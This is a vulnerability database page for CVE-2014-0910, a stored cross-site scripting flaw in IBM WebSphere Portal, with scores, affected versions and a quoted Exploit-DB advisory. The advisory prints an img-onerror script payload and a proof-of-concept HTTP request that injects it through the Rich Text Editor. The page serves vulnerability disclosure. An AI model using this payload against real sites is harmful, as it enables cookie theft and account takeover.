CVE-2014-0910 : Detail

CVE-2014-0910

Cross-site Scripting
A03-Injection
1.28%V4
Network
2014-06-18
14h00 +00:00
2017-08-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in IBM WebSphere Portal 6.1.0.0 through 6.1.0.6 CF27, 6.1.5.0 through 6.1.5.3 CF27, and 7.0.0 through 7.0.0.2 CF28 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.5 AV:N/AC:M/Au:S/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 36941

Publication date : 2015-05-06 22h00 +00:00
Author : Filippo Roncari
EDB Verified : No

IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability [CVE-2014-0910] [+] Author: Filippo Roncari [+] Target: IBM WebSphere Portal [+] Version: 7.0, 6.1.5, 6.1.0 [+] Vendor: http://www.ibm.com [+] Accessibility: Remote [+] Severity: Medium [+] CVE: CVE-2014-0910 [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf [+] Info: f.roncari@securenetwork.it [+] Summary IBM WebSphere Portal is a leader in the market product that provides enterprise web portals to help companies deliver a highly-personalized, social experience for their customers. IBM WebSphere Portal gives users a single point of access to the applications, services, information and social connections they need. [+] Vulnerability Details IBM WebSphere Portal is prone to a stored Cross-Site Scripting (XSS) vulnerability in the Web Content Management component, which allows authenticated users to inject arbitrary JavaScript. A potential attacker authenticated to the Web Content Management can exploit this vulnerability by creating a malicious web content and persuading the victim to visit it. This issue can lead to different kind of user-targeted attacks such as cookie stealing and account violation. [+] Technical Details View full advisory at https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf for technical details and source code. [+] Proof of Concept (PoC) Authors are able to insert HTML tags through the HTML view of the Rich Text Editor when creating a new web content, although active scripts are blocked and not executed. However it is possible to inject arbitrary JavaScript using a licit tag such as "img". Rich Text Editor tries to correctly handle the tag allowing client-side script being executed. A trivial payload like the following can be used: [!] Sample Payload ------------------------- <img src=a onerror=alert(document.cookie)> ------------------------- An exemplifying HTTP request is reported below. [!] PoC HTTP Request ------------------------- POST portal/!ut/p/b1/pZHLboMwEEW_KLJJeC5HGHAQkJZQCt5EzqMmx[...] HTTP/1.1 Host: Proxy-Connection: keep-alive Content-Length: 20108 Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAzBIVym1up1GRKBv Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wh" save_and_read_controllable ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wa" [...] true ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14Content_inithtml" ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_cmpnt_map_19W14388ed1e14Content" <img src=a onerror=alert(document.cookie)> ------W ebKitFormBoundaryAzBIVym1up1GRKBv Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14_RTE" ------------------------- For further details and explanations check the full advisory. [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.

Products Mentioned

Configuraton 0

Ibm>>Websphere_portal >> Version 7.0.0.0

Ibm>>Websphere_portal >> Version 7.0.0.1

Ibm>>Websphere_portal >> Version 7.0.0.2

Configuraton 0

Ibm>>Websphere_portal >> Version 6.1.5.0

Ibm>>Websphere_portal >> Version 6.1.5.1

Ibm>>Websphere_portal >> Version 6.1.5.2

Ibm>>Websphere_portal >> Version 6.1.5.3

Configuraton 0

Ibm>>Websphere_portal >> Version 6.1.0.0

Ibm>>Websphere_portal >> Version 6.1.0.1

Ibm>>Websphere_portal >> Version 6.1.0.2

Ibm>>Websphere_portal >> Version 6.1.0.3

Ibm>>Websphere_portal >> Version 6.1.0.4

Ibm>>Websphere_portal >> Version 6.1.0.5

Ibm>>Websphere_portal >> Version 6.1.0.6

References

http://www-01.ibm.com/support/docview.wss?uid=swg1PI18845
Tags : vendor-advisory, x_refsource_AIXAPAR